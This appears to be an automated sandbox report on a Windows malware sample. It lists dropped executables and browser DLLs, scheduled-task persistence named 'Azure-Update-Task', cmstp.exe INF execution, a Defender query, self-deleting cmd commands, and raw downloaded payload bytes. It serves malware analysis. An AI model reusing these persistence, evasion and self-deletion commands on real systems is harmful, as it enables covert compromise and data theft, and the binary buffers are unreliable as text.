cmdline "powershell" Get-MpPreference -verbose
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp"
cmdline schtasks.exe /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp"
file C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe
file C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe
file C:\Users\test22\AppData\Local\Temp\zxcv.EXE
file C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe
file C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe
file C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe
file C:\Users\test22\AppData\Local\Temp\rc.exe
file C:\Users\test22\AppData\Local\Temp\ds1.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\zxcv.EXE
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\breakpadinjector.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\prldap60.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\nss3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\freebl3.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\nssdbm3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\ucrtbase.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-handle-l1-1-0.dll
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2760)
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\Qv4SXRxX8p.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\Qv4SXRxX8p.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\4a3K8bEiw2.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\4a3K8bEiw2.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 3588
thread_handle: 0x000007c0
process_identifier: 3584
current_directory:
filepath:
track: 1
command_line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000007b4
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe"
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: schtasks.exe
parameters: /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp"
filepath: schtasks.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 1072
thread_handle: 0x000000ac
process_identifier: 1828
current_directory:
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000b0
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: schtasks.exe
parameters: /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp"
filepath: schtasks.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 3096
thread_handle: 0x00000218
process_identifier: 180
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\j0fojguc.inf
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 1
process_handle: 0x0000021c
1 1 0

CreateProcessInternalW

 thread_identifier: 3508
thread_handle: 0x000001ac
process_identifier: 3488
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "powershell" Get-MpPreference -verbose
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 1
process_handle: 0x000001bc
1 1 0

CreateProcessInternalW

 thread_identifier: 2076
thread_handle: 0x000000ac
process_identifier: 2092
current_directory:
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000b0
1 1 0

CreateProcessInternalW

 thread_identifier: 3432
thread_handle: 0x000001b4
process_identifier: 3384
current_directory: C:\Users\test22\AppData\LocalLow
filepath:
track: 1
command_line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kyr1rxzc.inf
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 1
process_handle: 0x000001b8
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000330
process_name: SearchProtocolHost.exe
process_identifier: 2332
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: zxcv.EXE
process_identifier: 2424
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: GDSFbnvfghsrf.exe
process_identifier: 2520
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: zxcv.EXE
process_identifier: 2604
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: GDSFbnvfghsrf.exe
process_identifier: 2708
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: Fdfgrytbvdfsd.exe
process_identifier: 2760
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: WerFault.exe
process_identifier: 2824
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: WerFault.exe
process_identifier: 2904
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: WerFault.exe
process_identifier: 2912
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: cmd.exe
process_identifier: 2380
1 1 0

Process32NextW

 snapshot_handle: 0x00000330
process_name: pw.exe
process_identifier: 2440
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2424
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x003f0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL~ð`à 0*>I `@  @…èHS`°€  H.textD) * `.rsrc°`,@@.reloc €2@B IHàXðT©à¯0*0: =*0x L™®4a% ^Eàÿÿÿ+rp  ƒb¹wZ ´Ã‚}a+Î*0M –iË ÄW2a% ^EÜÿÿÿ&+$rp  H ÚZ ;¶#a+Ê mgZ â Ñha+»*0( *0 (}}( c["w ՇJa%  ^E w)ËEÇÿÿÿ‡¹8´{(rp(ˆ%|(s o  ƒ¸Z 6è<7a+‡{(r#p(ˆ%|(s o  ÖâªËZ ŒÌ»a8Eÿÿÿ{(r'p(ˆ%|(s o  xf`vZ ‰ ¢¼a8ÿÿÿ{(r+p(ˆ%|(s o  [áDŸZ Ë+ýa8¾þÿÿ(  ÆǎZ Šºø>a8£þÿÿs }{(r/p(ˆ%|(s o  (îZ Lv¼la8Uþÿÿ{(r3p(ˆ%|(s o  _5}Z Ré¶^a8þÿÿ*0L šw¶ [ka% ^EÜÿÿÿ&+$( šMfÈZ "K`a+Ë (š„–Z D!ºa+»*0Yt iÐ_ d„Ýa% ^Ez8R(íöÚ¢ÐPº¦ÿÿÿ#f8ñ{( o  PŒ±4Z ! R¦a+ƒ(r7p( âw Z 1 ta8[ÿÿÿ(u‹( (  M.&£Z —8Ža81ÿÿÿ{ o ( âÆ*Z 6:Da8 ÿÿÿ(r7p(  - YÿlU%+ †C%&8Ûþÿÿ o  †°shZ á5ña8¾þÿÿ þòÜZ °To¤a8©þÿÿ, ÏÏNâ%+ ö„í%& 8»î,Za8ˆþÿÿ w"Z hÌ §a8sþÿÿsÔ( ô_8p8Yþÿÿ &î¡wZ [?ùa8Eþÿÿ(  ÍzÚ'Z Ÿv7õa8*þÿÿ{( o! r?p o þ ƒmTZ 0èË=a8ñýÿÿ- €Ïzè%+ êtï%& (œctZa8Ñýÿÿ o" & œña3Z ó.C a8µýÿÿ*0Á bE¼í @‡s®a% ^ED(vÌÿÿÿc‹8†(# ÞÀê+½{þ+ 1ñŔ+©, á Nñ%+ Ù!»%& ‰¼J—Za+{( „¤ÙZ ­pæna8nÿÿÿ ^ünèZ ¡ˆÕEa8[ÿÿÿ,¦ £‡¢Z EVùÐa8Fÿÿÿ*0g SX'& á®s a% ˆ^EˆPßÞöÁ¶ ²ú – äž lðeJHX ‡Ì Ê -±h Dx’©Èýÿÿ /*D 1 • Ó8 Ù ª ,ä ò0É „ °c) p¤ ØÏtð ð žæݘƒ¼O Æ< b iÅ®v*À\wÐ:o&ê z ¢×–yý&rd B YGÁU ŸêHS³u ÄF/Vf |…=[ù‹ ÂÏô ’3 ‹Q 8(þs$ (E ¹Mê?Z è[¨a8£ýÿÿ  -]Z ZÆñga8ýÿÿ(? ƒòEAZ ËÌÂ#a8wýÿÿ{rWp(( e šIZ Õc4­a8Uýÿÿ .~P#Z €FÅ`a8Býÿÿ ±}/AZ `k¥›a8/ýÿÿ{ (% (3 ½ÂæZ zÌxîa8 ýÿÿ Ý´Ü,Z ©×~Fa8úüÿÿ õXµ+Z †8V´a8çüÿÿ{r{p(5 ÍfßZ ß­ª¶a8Äüÿÿ{( " A(!("&{( " A(!("&{( " A(!("&{(#{($ O=·†Z %#a8Füÿÿ{(& (0 0!Z ŽŠ]¨a8$üÿÿ È©ü\Z ¹¿}a8üÿÿ Z³¤½Z àhBta8þûÿÿ{ (% (3{  J œs' (& úK‰Z ì ×Ëa8Àûÿÿ ¸Òõ…Z ÇW¸a8­ûÿÿ{(%{r¡p"B(1(2 ²NFRZ ¨FDa8qûÿÿ !—Ñ6Z žþÉÉa8^ûÿÿ{(*" A(+(,& xµŒZ aDa80ûÿÿ ¿Ùñ±Z ·W«|a8ûÿÿ{(% ß#ÀµZ ÛÃJ½a8þúÿÿ{( " A(!("& d÷Z C±ƒ a8Ðúÿÿ }Š¶Z 4ìÙ>a8½úÿÿ{þs$ (7 H¢tdZ éøi&a8“úÿÿ{  (6 ð3ÇZ ïð¾ a8túÿÿ{() Ú êKZ ZkKa8Vúÿÿ{ (6{þs$ (7 üÑÞ Z ûœ8œa8úÿÿ ‚Š¨Z (ÌFja8 úÿÿ{ þs$ (7 Dz7ÖZ •¬^a8ãùÿÿ{( ŸÈW Z Áä¡a8Ãùÿÿ{ s( (' ~Ë\CZ ø`a8ùÿÿ( ü¸wõZ m‡œ«a8…ùÿÿ yy9³Z 7*a8rùÿÿ(9 "õgZ ÖKРa8Yùÿÿ{r3p(4 Ù:F^Z Y«ïa87ùÿÿ{ p œs' (&{ rËp(( `JNZ P¬r[a8ýøÿÿ{ r+p(4 {ªZ²Z ¼X©{a8Ûøÿÿ{ g
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ à``îð@°@ œ ÐÒpW`CODE”Þà `DATALðä@ÀBSS‘öÀ.idataœ "ö@À.tlsPÀ.rdata`@P.relocWpX@P.rsrcÒÐÒr@P°D@P@Boolean@FalseTrue@,@Charÿ@@Integer€ÿÿÿ‹ÀX@Byteÿl@Wordÿÿ€@Cardinalÿÿÿÿ˜@ Stringì@ì@¨=@´=@¸=@¼=@°=@ü:@;@T;@TObjectø@TObjectì@System@ IInterfaceÀFSystemÿÿ̃D$øéqPƒD$øéPƒD$øé™PÌÌE@O@Y@ÀFe@@à@q@à@  @¨=@”a@ a@¼=@°=@°a@;@T;@TInterfacedObject‹Àÿ%Ð!E‹Àÿ%Ì!E‹Àÿ%È!E‹Àÿ%Ä!E‹Àÿ%À!E‹Àÿ%¼!E‹Àÿ%¸!E‹Àÿ%´!E‹Àÿ%°!E‹Àÿ%¬!E‹Àÿ%¨!E‹Àÿ%¤!E‹Àÿ%ä!E‹Àÿ% !E‹Àÿ%à!E‹Àÿ%œ!E‹Àÿ%˜!E‹Àÿ%”!E‹Àÿ%!E‹Àÿ%Œ!E‹Àÿ%ˆ!E‹Àÿ%„!E‹Àÿ%€!E‹Àÿ%|!E‹Àÿ%x!E‹Àÿ%t!E‹Àÿ%p!E‹Àÿ%Ü!E‹Àÿ%l!E‹Àÿ%h!E‹Àÿ%d!E‹Àÿ%ô!E‹Àÿ%ð!E‹Àÿ%ì!E‹Àÿ%`!E‹Àÿ%\!E‹Àÿ%"E‹Àÿ%"E‹Àÿ%ü!E‹Àÿ%X!E‹Àÿ%T!E‹Àÿ%P!E‹Àÿ%L!E‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ%H!E‹Àÿ%D!E‹Àÿ%@!E‹Àÿ%<!E‹Àÿ%8!E‹Àÿ%4!E‹Àÿ%0!E‹Àÿ%,!E‹ÀSƒÄô»äEƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹àE‰‹D$£àE3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹äE‰£äEYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸èEèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸èEèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡èE‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÄE‹èýÿÿ‹D$‰¸èE;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡èE‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸èE;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡èE‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÄE‹‹‰¸èE;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½øEÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½øEÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸øEè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸øEè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUh€@dÿ2d‰"hÈEè¼÷ÿÿ€=IEt hÈEè±÷ÿÿ¸èEèCøÿÿ¸øEè9øÿÿ¸$E
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELsð`à 0 ¿ À@ @…̾OÀ°à  H.text$Ÿ   `.rsrc°À¢@@.reloc à¨@B¿HÀÎ ðT`¦`(0*0:rp íÒÎA f¶^<a% ^Eàÿÿÿ+ –˜°Z NWéÅa+Ô*0: œ`ÊÇ ºœ°¤a% ^Eàÿÿÿ+rp  \±žZ ©Æ™Äa+Î*09( ©m¸ GM æa% ^Eàÿÿÿ+ c†Z ™y×ua+Ó*0 S(}}( ( s }{(r!p(ˆ%|(s o {(r%p(ˆ%|(s o {(r)p(ˆ%|(s o {(r-p(ˆ%|(s o {(r1p(ˆ%|(s o {(r5p(ˆ%|(s o *0L BcÒ J2Ùa% ^EÜÿÿÿ&+$( 0 ë7Z Ûì|öa+Ë Ñ@Z Ôþa+»*0Yt (u‹( ( ( ‡±mL 0Aµa% ^E“ŽK¯×y\Íp¹.7¦ÿÿÿ"H8Ò, aU%+ þ½S%& /µ)RZa+‰ V,þ`Z RÑ®6a8tÿÿÿ Ú;øZ ›uš(a8`ÿÿÿ(r9p(  - ïSè)%+ +ù»w%&82ÿÿÿsÔ( µµj8ÿÿÿ{( o  ÌlVîZ :a™a8òþÿÿ ð>]£Z 6ùÒDa8Þþÿÿ{ o ( o  o! & Ҙ„›Z ŽåGa8¤þÿÿ{( o"  ØtêZ HÙ ua8}þÿÿrAp å…¨Z ‡‚„a8cþÿÿ h¶¨MZ bý¦a8Oþÿÿ ږZ Ѳça8;þÿÿ o þ mÃZ sW<Ua8þÿÿ, ÷<z%+ Þ×%& DÔú9Za8üýÿÿ(r9p( ¶§I°Z ›-’³a8Ôýÿÿ*0É,d „ íï‹da% ^E%ÌÿÿÿkˆX98ƒ ¶“_Z õ/ªCa+¼ 0xcZ X9 |a+¬{þ+ ¼G+˜, §,Þ%+ Ü¿Æ%& ü— ÛZa8yÿÿÿ ¨ßÓLZ ^Ô a8fÿÿÿ{( &«Þ&Z £¢¾ka8Iÿÿÿ(# *0¿ Î(« ‚ŽÆGa% Œ^EŒI¦>= +‰: ›`? — «Ž ×^Î :˜uÄiøá (N,  »  avØÿ ;-“ ± úz, mÅ” y Cvúd ÀäÓ¶¨‘ÚV¤aJ̜ ³ ­'äA÷6á í{ýëϸýÿÿÐ  ` 4‹‹(ÈM€s f S/–ÑN¥# t úÅã a h^S ø@' ¡ TÚ·>lB'5 ŽßD ® ðË^ ­_M 8p —ÖìZ ,ß{a8¥ýÿÿ ­á\Z qP¸a8’ýÿÿ )äÌZ .ïa8ýÿÿ{(#{ ($ QZ lÏ=Úa8Týÿÿ"À@"PAs$ (8 JÐ÷Z ɼz1a8,ýÿÿ{ þs% (7{ (& (0 â÷â_Z ÿ>V9a8ñüÿÿ ÷©ÂZ žKã"a8Þüÿÿ{ r1p(4 §êäZ å&ra8¼üÿÿ{ gNs' (-  Z \fa8•üÿÿ ´ =)Z ;Îrfa8‚üÿÿ{ (( (3 IiùZ áEÚ(a8_üÿÿ(} ÉëZZ Jßà a8Büÿÿ{þs% (/ †žƒUZ ßtÎa8üÿÿ{ (. æ¦ÖeZ »ð¼2a8ùûÿÿ Ê2ŠZ °š6a8æûÿÿ{rYp(5 Â3ÞæZ ÆÊXa8Ãûÿÿ{r5p(4{rp(5 þSQZ C$Ha8Žûÿÿ ¹úZ Èåð(a8{ûÿÿ{ þs% (7 … êxZ SVÈJa8Pûÿÿ{( " A(!("& vÖâÓZ ¾æa8"ûÿÿ{þs% (7 "«EZ aH¹¹a8øúÿÿ q Z x98aa8åúÿÿ{ (( (3 K2ZZ `þa8Ãúÿÿ =_ÂZ ý¾¬/a8°úÿÿ{r—p"B(1(2{(( (3 b^ádZ 2÷9a8oúÿÿ 9›'åZ »3½0a8\úÿÿ{(% rúŠ8Z €Éàa8<úÿÿ{ · 8s) (& ãFwîZ a+¡àa8úÿÿ{ rÁp(( äm9Z c¢Ùja8îùÿÿ{ p œs) (& ¯Z Püf×a8Åùÿÿ{rÏp(( D3Z öa8£ùÿÿ ³MYØZ PlŒa8ùÿÿ \f¥£Z >—ía8}ùÿÿ{() e$¨#Z ÎÊŒa8_ùÿÿ{(& (0 -€Ê>Z O¬¹a8=ùÿÿ ×ÈgtZ ,uôa8*ùÿÿ{ (& (0 A5•KZ Ž2'a8ùÿÿ{(*" A(+(,& d¤×ˆZ €öÛ}a8Ùøÿÿ ìú Z -éô»a8Æøÿÿ{(& (0 ŠÛ±Z ¼`Dœa8¤øÿÿ(}(} 2¨‘Z •V/Ša8|øÿÿ{ (% ãÓÂþZ ró¸&a8]øÿÿ{(#{ ($
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELuð`à 0œº À@ @…ĹWÀ°à  H.text$š œ `.rsrc°Àž@@.reloc à¤@BºHÈÉüïTX©p 0*0M ÙЍ“ @旒a% ^E&Üÿÿÿ+$rp  —^©Z ÷b\ƒa+Ê Ù(™–Z >¯ûYa+»*0:rp ‚u ý´0a% ^Eàÿÿÿ+ ¿ø.Z ¨ta+Ô*0( *0 "(}}( +6ê )GÒºa%  ^E G(~Ãÿÿÿ4ŠkÀÌ8Ç( s }  qLŸZ +Šè–a+ {(r%p(ˆ%|(s o  â´Z «9Bòa8]ÿÿÿ ÕKZ ­W*a8Jÿÿÿ{(r)p(ˆ%|(s o  2`_:Z Â1Uwa8ÿÿÿ{(r-p(ˆ%|(s o {(r1p(ˆ%|(s o  f>Ÿ”Z À¢'a8”þÿÿ °r¡@Z yØ1a8þÿÿ{(r5p(ˆ%|(s o  ‡ÑðZ fIh‘a8>þÿÿ{(r9p(ˆ%|(s o  2X;XZ ­Ô²a8üýÿÿ*0(*0ž Èg»ï f Üâa% ^E}N:‡ªðiËÛ6µë¡*jšÿÿÿ81 "WörZ à‡Ñza+‰ îøHZ ºö¬a8uÿÿÿ(u‹( ( ( - ’ä¬k%+ 5`‘t%& YûÄüZa86ÿÿÿ Ÿ­FZ új³Ûa8"ÿÿÿ{( o r=p 03‰7Z T7©·a8õþÿÿ , Úc¾%+ àiNŸ%& îЌfZa8Ôþÿÿ(rUp( ÷ æ8´þÿÿ(rUp( ºìZ Å,ca8Œþÿÿ{ o ( Þ«aSZ Gö1a8eþÿÿ õYÛlZ ™Öö«a8Qþÿÿ o & ù#_„Z ùpß!a85þÿÿ o!  Ž\J‘Z r±Øa8þÿÿsÔ( GqïÝ8þýÿÿ Nv‡óZ X ˜ea8êýÿÿ{( o"  ˜…ìKZ ðžÞ‹a8Äýÿÿ Z2#ŸZ ÈNþ©a8¯ýÿÿ o 